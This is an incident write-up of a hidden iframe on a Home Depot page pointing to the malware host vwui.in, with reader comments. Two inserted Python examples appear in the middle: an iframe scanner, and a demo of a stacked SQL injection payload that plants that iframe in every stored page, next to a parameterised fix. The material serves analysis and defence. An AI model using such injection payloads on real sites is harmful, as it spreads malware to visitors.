Home Depot Website Hack

Tuesday, January 11, 2011

Mark Baldwin


It is interesting how a minor home improvement project can result in the discovery of a hack on a major retail website.  It all started with a simple Google search for “home depot stair spindles”.

[screenshot: Google search results for "home depot stair spindles"]

The first organic (unpaid) result in the search is hxxp://www6.homedepot.com/stairparts/gallery.html, as shown above.

As it turns out, this page contains an invisible iframe whose source is the external site vwui.in on port 8080, as shown below.

[screenshot: page source showing the injected iframe]

As can be seen in the screenshot, the code below has been injected into the page (as several commenters point out, the iframe tag in the current source is wrapped in an HTML comment, so browsers do not render it):

[image of the injected code]
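Finding an injection like this by eye is easy once you know where to look; finding it across a site is not. The following is an added example (not code from the original post) that scans saved HTML for iframes whose source points off-site and reports what makes each one suspicious: a zero-size or CSS-hidden frame, a non-standard port, and whether the tag survives only inside an HTML comment (not rendered, but still in the file and still visible to signature-based scanners, which is exactly the situation the comments below describe). The sample page is constructed; only the host vwui.in and port 8080 come from the post, and the path and attribute values are assumptions.

```python
"""Flag off-site iframes in a saved HTML page, including ones the attacker
made invisible and ones that survive only inside an HTML comment.

Added example, not code from the original post. Standard library only."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page. The off-site host vwui.in and port 8080 come from
# the post; the path, the zero-size attributes and the rest of the markup are
# assumed for illustration.
SAMPLE_HTML = """<html><head><title>Stair Parts Gallery</title></head>
<body>
<h1>Gallery</h1>
<iframe src="/stairparts/sidebar.html" width="300" height="200"></iframe>
<!-- <iframe src="http://vwui.in:8080/" width="0" height="0"></iframe> -->
<iframe src="http://cdn.example.net/widget.html" style="display:none"></iframe>
</body></html>"""

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class IframeCollector(HTMLParser):
    """Collects (attrs, commented_out) for every <iframe> in the document."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append((dict(attrs), False))

    def handle_comment(self, data):
        # Commenting markup out leaves it in the page; re-parse the comment
        # body so a "disabled" injection is still reported.
        inner = IframeCollector()
        inner.feed(data)
        inner.close()
        self.frames.extend((attrs, True) for attrs, _ in inner.frames)


def _is_zero(value):
    """True for width/height values such as "0" or "0px"."""
    return value is not None and value.strip().rstrip("px").strip() == "0"


def is_hidden(attrs):
    """True for zero-size frames or frames hidden via inline CSS."""
    return (_is_zero(attrs.get("width")) or _is_zero(attrs.get("height"))
            or bool(HIDDEN_STYLE.search(attrs.get("style") or "")))


def scan_iframes(html, site_host):
    """Return one finding per iframe whose src points outside site_host."""
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for attrs, commented_out in parser.frames:
        src = attrs.get("src") or ""
        url = urlsplit(src)
        host = (url.hostname or "").lower()
        if not host or host == site_host or host.endswith("." + site_host):
            continue  # relative or same-site src: not what we are hunting
        try:
            port = url.port
        except ValueError:  # malformed port in src; treat as unknown
            port = None
        findings.append({
            "src": src,
            "host": host,
            "port": port,
            "nonstandard_port": port not in (None, 80, 443),
            "hidden": is_hidden(attrs),
            "commented_out": commented_out,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_iframes(SAMPLE_HTML, "homedepot.com"):
        print(finding)
```

Run against a crawl of saved pages (one call per file, with the site's own hostname), the commented_out flag separates "someone disabled the injection but left it in place" from "this is live", and the nonstandard_port flag picks out the 8080-style hosting the post discusses.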

The site vwui.in is listed as a malicious site by both Google Safe Browsing and StopBadware, with one listing going back to July 2009.

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://vwui.in/

http://stopbadware.org/reports/90331f78dc600d02b5c6f6e77f807915

After discovering this, I investigated the vwui.in site to try to determine what type of malware it was hosting.  As it turns out, the domain no longer resolves:

[prompt ~]$ host vwui.in
Host vwui.in not found: 3(NXDOMAIN)

StopBadware lists the IP associated with this domain as 209.85.51.176, which according to the ARIN whois database belongs to ThePlanet.com Internet Services:

[prompt ~]$ whois 209.85.51.176
[Querying whois.arin.net]
[whois.arin.net]
Optical Jungle EVRY-753 (NET-209-85-51-0-1) 209.85.51.0 – 209.85.51.255
ThePlanet.com Internet Services, Inc. NETBLK-THEPLANET-BLK-EV1-15 (NET-209-85-0-0-1) 209.85.0.0 – 209.85.127.255

Furthermore, when this IP is opened in a browser it redirects to hxxp://searchmanified.com, which also appears to be serving some type of malware.

So how did this page on Home Depot’s website get compromised?  It is not possible for me to know for certain without a complete investigation, but I can make an educated guess.  Attacks of this type typically use one of several vectors:

  • Compromised FTP credentials due to a weak password
  • Brute force compromise of server credentials
  • SQL injection

Back in 2009, tens of thousands of web sites were injected with hidden iframes that attempted to download malware onto the machines of visitors.  In many cases these attacks exploited SQL injection vulnerabilities to insert the hidden iframe into page content stored in the site’s database.
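To make the SQL injection vector concrete, here is an added example (not from the original post, and not the statement actually used against any site) showing how a single injectable write path can tag every stored page with an iframe, and the parameterised query that closes it. The schema, the page content and the payload are constructed; the example uses SQLite, with `executescript` standing in for a driver or application stack that accepts stacked statements, which is the behaviour a mass injection relies on. The iframe's host and port come from the post; its path is an assumption.

```python
"""Stacked-statement SQL injection that appends an iframe to every stored
page, beside the parameterised query that prevents it.

Added example, not code from the original post. The schema, content and
payload are constructed; executescript models a stack that runs stacked
statements (an assumption about the target, not a fact from the post)."""
import sqlite3

# Host and port from the post; the path is assumed.
IFRAME = '<iframe src="http://vwui.in:8080/" width="0" height="0"></iframe>'


def make_db():
    """Fresh in-memory database with two constructed pages."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE pages(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO pages(title, body) VALUES
          ('Stair Parts Gallery', '<h1>Gallery</h1>'),
          ('Home', '<h1>Welcome</h1>');
    """)
    return con


def rename_page_vulnerable(con, page_id, new_title):
    """User input spliced straight into the statement; stacked statements run."""
    sql = f"UPDATE pages SET title = '{new_title}' WHERE id = {int(page_id)}"
    con.executescript(sql)


def rename_page_safe(con, page_id, new_title):
    """Bound parameters: the title is data, never SQL, and only one statement runs."""
    con.execute("UPDATE pages SET title = ? WHERE id = ?", (new_title, int(page_id)))
    con.commit()


# Attacker-controlled "title": closes the string literal, appends a second
# UPDATE that tags every row's body with the iframe, then comments out the
# remainder of the original statement.
PAYLOAD = "x'; UPDATE pages SET body = body || '" + IFRAME + "'; --"


def bodies_with_iframe(con):
    """One boolean per page, in id order: does the stored body carry the iframe?"""
    rows = con.execute("SELECT body FROM pages ORDER BY id").fetchall()
    return [IFRAME in body for (body,) in rows]


def titles(con):
    return [t for (t,) in con.execute("SELECT title FROM pages ORDER BY id")]


def demo():
    """Run the same payload through both code paths and report the outcome."""
    vuln = make_db()
    rename_page_vulnerable(vuln, 1, PAYLOAD)
    safe = make_db()
    rename_page_safe(safe, 1, PAYLOAD)
    return bodies_with_iframe(vuln), bodies_with_iframe(safe), titles(safe)[0]


if __name__ == "__main__":
    vuln_bodies, safe_bodies, safe_title = demo()
    print("vulnerable path, iframe in each body:", vuln_bodies)
    print("safe path, iframe in each body:     ", safe_bodies)
    print("safe path stored the payload as plain title text:", safe_title == PAYLOAD)
```

The vulnerable path touches every row in one request, which is why a single injectable parameter on one page can leave the same iframe in pages across an entire site; the safe path stores the attacker's string as an ordinary title and leaves the page bodies untouched.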

These campaigns also tended to serve their malware on port 8080 rather than the standard port 80.

Given that vwui.in was first listed as a malicious site back in 2009, that it served on port 8080, and that the domain no longer has any DNS records, it is quite possible that the Home Depot page was originally compromised as part of this massive 2009 attack and has only now been discovered.

While the iframe in the Home Depot page is not currently a threat (its target domain no longer resolves), the vulnerability that allowed it to be inserted may still be present and could lead to a future compromise of the site.  I attempted to contact Home Depot to inform them of this issue, but as of this writing I have not received a response.

Originally posted at InfoSecStuff.com.

Tags: Webappsec (General); Hacks, malware, iFrame Injection, websites, Home Depot, Code Injection

Comments:
Ben Keeley Nice find!
1) They should thank you
2) Can we have bigger images to view pls?
1294765960
Michael Menefee (2011-01-11 17:27 UTC):
Ben,

We're gonna link the images back to Mark's original post where you can view more detail.
Steve Bush (2011-01-11 18:38 UTC):
Umm, your screen shot shows that code is commented out.
Dr Who (2011-01-11 18:39 UTC):
It should have been pointed out in the article that this code was commented out and therefore not an issue.
Rod MacPherson (2011-01-11 18:44 UTC):
Scott and Steve,
That only brings up a new question.
If some web guy saw it, knew it wasn't part of the working site and thought to comment it out... why didn't it get removed altogether?
Michael Menefee (2011-01-11 18:53 UTC):
Rod, I agree... at least at one point in time it was probably NOT commented :)
Doug Henderson (2011-01-11 18:55 UTC):
Scott - the article does state that it is not currently a threat:

"While the iframe in the Home Depot website is not currently a threat"

Try reading an article before replying.

@Rod - probably some lazy outsourced developer.
Doug Henderson (2011-01-11 18:57 UTC):
Isn't the web a wonderful thing.

From LinkedIn:
Scott Frost, Senior Manager of Security at The Home Depot
Michael Menefee (2011-01-11 19:53 UTC):
Heh, looks like code comments are pretty common for their websites, including comments for which "defects" have been corrected:

"Added for Defect 7316", for example, on line 64 of the rendered HTML on the homepage

on www.homedepot.com
Mark Baldwin (2011-01-11 21:30 UTC):
Scott, you are correct that the iframe was commented out. This was an oversight on my part and was not left out intentionally. However, my AV product did generate an alert when I went to that page, so it was still being detected even though commented out. Again, I attempted to alert HD of the issue, but did not receive a reply.
Michael Menefee (2011-01-11 21:38 UTC):
Mark, just as a reference for people, which AV product and browser were you using when this alert occurred?
Mark Baldwin (2011-01-11 21:57 UTC):
Firefox 3.6 and Avast Antivirus.
Michael Menefee (2011-01-11 23:28 UTC):
Mark, that's excellent. Both are free for home users.
Michael Menefee (2011-01-12 03:22 UTC):
According to research by Jeremy Kaplan from FoxNews.com (http://www.foxnews.com/scitech/2011/01/11/home-depot-website-compromised/), Home Depot admits to having commented this code out in 2009 for "management and analysis".

Now, granted this is some secondary web server collaborating in Home Depot's public web presence, but given that this injection apparently attempted to install backdoor programs on client machines, and HomeDepot.com *does* handle e-commerce transactions, shouldn't this have been reported?

Also, had they had a reasonable security assessment performed on their external web presence in the past 13+ months, this *should* have come to light as well...
Rod MacPherson (2011-01-12 03:36 UTC):
I would think that if you wanted to keep it for analysis, you'd just make a copy of the infected site to offline storage so you can recreate it as needed, but it is not out there in your public-facing website waiting to become a publicity nightmare.
Don Walrus (2011-01-12 03:43 UTC):
Now Rod, why would you go and "think"? :D
To your point, a comment on the foxnews.com article:

"Two sites that I manage got hit last year with the same hack (yes, it was a hack, not a "security breach"). I did what any responsible webmaster would do: saved a copy of the affected html files offline and uploaded a clean copy of the site from a backup. I then analyzed the code at my leisure; turns out it redirected to a domain in China, of all places. Go figure."
Rod Smith (2011-01-12 07:30 UTC):
Great job Mark, maybe you solved the mystery of how my computer got hacked.

The hack was discovered 7-22-2009. Was NOT running any operational AV at the time - I foolishly prided myself on being savvy enough to surf without it (my Norton had expired). That summer (2009) I often visited the HD site with the computer I'm writing this on (a Fujitsu laptop running Vista), so maybe that's where I got infected. Windows Defender first found the Trojan - it called it "Renos.IO" in "Win32."

I then downloaded AVG Free but it failed to kick it out. Next I downloaded the AVG 8.5 paid 30-day free trial and it did kick the virus out. AVG then listed these in a CSV export file: Win32/Cryptor, Trojan horse SHeur2.ARZT, Trojan horse Generic14.HDQ, Trojan horse Generic14.HCY.

I have a screen shot from my ISP showing extremely high data transfers during that period (in 10 days, 7-15-09 to 7-25-09, had 5.6 GB download, 2.6 GB upload - compare to my monthly typical of less than 1 GB down/.2 GB up). I also have screen shots of Firefox & IE history showing porno and prize sites I never visited.

Unfortunately, unknown to me AVG was set to delete old history, so because of the limited info on the screen shots I have no proof of visiting the HD site - but I know I did, frequently.

Even though AVG reports no issues, I suspect that there is still some malware on this computer. It just acts funny a lot (but... it is sick with Vista :). Any comments?
Fred Williams (2011-01-14 21:54 UTC):
I've used Avast for the past 2 years and it has worked fine for me, but it has not caught everything. Whatever I get infected with, MalwareBytes usually gets rid of it.
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.